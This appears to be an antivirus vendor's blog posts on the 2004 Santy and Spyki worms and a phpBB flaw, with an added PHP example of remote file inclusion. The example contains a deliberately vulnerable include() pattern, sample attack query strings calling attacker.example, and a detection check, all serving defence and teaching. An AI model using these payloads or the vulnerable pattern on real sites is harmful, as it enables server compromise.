01 Mar Critical vulnerability found in phpBB software Roel
27 Dec Santy updates - worm renamed Aleks
26 Dec Update on Santy.e Roel
26 Dec New Santy also targets php vulnerabilities Roel
22 Dec Santy sourcecode publicly available Roel
22 Dec Preliminary evaluation of Santy outbreak Aleks
phpBB.com have announced that their phpBB software contains a critical vulnerability.
This news comes just days after the release of 2.0.12, which was released to address certain other vulnerabilities.
Exploitation of this vulnerability gives administrative rights, meaning arbitrary code can be executed.
This could mean that we see a Santy-like scenario all over again, with a lot of servers being affected.
I believe we would see only a few defaced websites in this case; instead I'm expecting a lot of zombies.
phpBB.com have released version 2.0.13, which is not affected by this vulnerability.
You are strongly urged to update to the latest version as soon as possible.
We've decided to rename Santy.d and Santy.e to Spyki.a and Spyki.b. We are doing this because:
A deeper analysis of the new worm that we detected at the weekend, which seemed to be a new version of Santy, shows that it is different from Santy. The most important difference is that it doesn't exploit vulnerable versions of phpBB to spread. It attacks any PHP script that contains a 'remote file inclusion' vulnerability. So the problem is not connected with which version of PHP is installed on the server; it is caused by errors in the programming of the PHP pages themselves.
Once the worm penetrates the server, it uploads Backdoor.Perl.Shellbot.a, also written in Perl. This backdoor connects to certain IRC channels to receive and execute commands from its author/user.
The new worm uses the Brazilian Google server for search requests, and includes the copyright of the Brazilian hacker group 'Atrix Team'; it seems that this group probably wrote the new worm.
We recommend everyone using PHP for web page programming to check their servers for errors. A description of the errors is here.
A more detailed analysis of Santy.e shows very worrying information.
The initial analysis suggested that with an up-to-date version of PHP one was not vulnerable to this attack, but it seems that Santy.e tries to exploit bad coding.
Santy.e tries to exploit PHP scripts with what is called "PHP Scripts Automated Arbitrary File Inclusion".
This can only be prevented with decent, secure coding.
This means that every site is potentially in danger.
There are already a fair number of reports of websites that get 'attacked' by infected hosts.
Expect sites to get compromised or become (very) slow, as unblocked attack traffic will (greatly) increase server load, since the server has to process every incoming request.
Sites/servers will need to come up with a way to block the attacks.
We will see how this develops.
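The 'remote file inclusion' programming error that the two posts above describe, and the request-level blocking that the last paragraph says sites will need, as an added example written for this page: it is not code from the blog, from phpBB or from the worm. It assumes PHP 7.1 or later; the file names, the `page` and `tpl` parameter names, the host `attacker.example` and the sample query strings are invented for illustration. The vulnerable pattern is shown beside its allowlist-based fix, followed by a check that flags requests whose parameters point at a remote resource, undoing URL encoding first so encoded and double-encoded variants don't slip past.

```php
<?php
// Added example, not code from the blog, phpBB or Santy/Spyki.
// File names, parameter names and sample requests are made up for illustration.

// 1. VULNERABLE pattern: the 'page' request parameter reaches include() unchecked.
//    On a PHP 4 / early PHP 5 server with allow_url_fopen=On (the default then),
//    ?page=http://attacker.example/cmd.txt? makes PHP download and execute the
//    attacker's script: a remote file inclusion. The trailing '?' turns the
//    appended '.php' into a query string, so the remote URL still resolves.
function vulnerable_page(string $page): void
{
    include $page . '.php';   // user input decides what gets executed: never do this
}

// 2. HARDENED pattern: the parameter only selects an entry from a fixed allowlist,
//    so no attacker-controlled string is ever used as a file name.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;   // null: caller should answer 404, never include()
}

// 3. REQUEST-LEVEL check, for hosts that cannot fix every script at once:
//    return the names of query parameters whose value points at a remote
//    resource, which is what an RFI attack request looks like in the access log
//    or at the front door. Encoding is undone in a bounded loop so %2F, %252F
//    (double-encoded) and so on are still caught. PHP stream wrappers (php://,
//    data:) are flagged as well; that is a generalisation beyond what the post
//    describes, since they also feed attacker-supplied code into include()
//    without involving a remote host.
function rfi_suspects(string $query_string): array
{
    $suspects = [];
    parse_str($query_string, $params);          // decodes one layer of %XX
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;                           // array parameters (a[]=1) not checked here
        }
        $v = $value;
        for ($i = 0; $i < 3; $i++) {            // undo up to three further layers
            $d = rawurldecode($v);
            if ($d === $v) {
                break;
            }
            $v = $d;
        }
        if (preg_match('#^\s*(https?|ftp)://#i', $v)
            || preg_match('#^\s*(php|data):#i', $v)) {
            $suspects[] = (string) $name;
        }
    }
    return $suspects;
}

// Constructed sample requests (not real captured traffic).
$samples = [
    'page=home',
    'page=http://attacker.example/cmd.txt?',
    'page=http%253A%252F%252Fattacker.example%252Fcmd.txt',   // double-encoded
    'id=42&tpl=ftp://attacker.example/x',
    'page=php://input',
];
foreach ($samples as $q) {
    $hits = rfi_suspects($q);
    printf("%-55s -> %s\n", $q, $hits ? 'RFI suspect: ' . implode(',', $hits) : 'clean');
}

// The hardened resolver rejects the same input the vulnerable one would execute.
var_dump(resolve_page('home'));                            // string "pages/home.php"
var_dump(resolve_page('http://attacker.example/cmd.txt')); // NULL
```

Run it with `php rfi_example.php`. The `rfi_suspects()` check can be called from a front controller before any script runs, or the same pattern can be expressed as a web-server rewrite rule; either way it only reduces exposure, it does not fix the scripts. As defence in depth, set `allow_url_fopen = Off` in php.ini (and `allow_url_include = Off` on PHP 5.2 and later, where it is off by default): that removes the remote part of the attack, but, as the post says, only correct code stops an attacker from including a file he has already got onto the server by other means.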
We have detected a new Santy variant which also targets vulnerabilities in older versions of PHP.
This new variant is more advanced/dangerous in a number of ways:
- Uses Yahoo in addition to Google to search for vulnerable sites.
- Targets, in addition to 'phpBB pre 2.0.11' sites, also sites that run an older version of PHP.
- The new Santy variants try to install a bot, giving its masters control over the host.
- Most sites have a lot of bandwidth, which would make a spam run or DDoS extremely effective, although this is a side effect.
We detect the latest Santy variant as Net-Worm.Perl.Santy.e, the installed bot as Backdoor.Perl.Shellbot.b.
There are also some other new Perl Backdoors.
We would like to urge everybody to make sure their PHP is up to date (as well as phpBB, of course).
If you don't host your own site, contact your hosting provider even though it's Christmas; malware doesn't wait until next week.
We have received information that the Santy source code has been published on certain sites and security-related mailing lists.
This opens the door for new variants to arise. However, I doubt that new variants will be very effective, unless search engines just keep on spitting out new, unpatched sites.
But seeing that a lot of sites are already infected, patched or a combination of both, I think the situation will not get as bad as we have seen now with Santy.a.
Google has announced that it will block search requests from Santy in order to prevent the worm from spreading further. I don't think that this is enough to solve the problem. The author can always release new versions that use other search engines, MSN or Yahoo for instance.
What is worse, we have discovered a new version of Santy. It seems very likely that some 'script kiddies' have gotten hold of the source code. If this is true, they will create new versions with new features, just like Lovesan. The author of Lovesan is still free, but several co-authors have been arrested, even though they only changed some text strings in the worm's file.
It is hard to count the exact number of sites infected by Santy over the past 24 hours. Search engines only find the texts created by the worm that are still online. Many other sites have been disinfected or closed down. My first rough estimate would put the number at several hundred web sites worldwide. However, due to the above, the actual number may well be in the thousands.
PS So far the maximum number of Santy.a generations we have seen remains at 24:
A new variant of Santy was found some hours ago. We detect it as Net-Worm.Perl.Santy.b.
Further analysis has shown that although older versions of phpBB are vulnerable, phpBB 2.0.11 is not.
Therefore we strongly urge everyone to update to phpBB 2.0.11 to prevent infection by this Worm.
Today we received reports about certain sites being defaced. Investigation has shown that a worm which utilizes a vulnerability in phpBB is responsible for this.
phpBB is very popular software for internet boards/forums, so this affects a lot of sites. Therefore we are putting a Red Alert on it.
Currently there is no patch for this problem, only a work-around, which can be found here.
The worm is extra tricky because it replaces asp/php/htm/shtm files with its own code, meaning not only that you might lose data, but also that other sites on the same host get infected.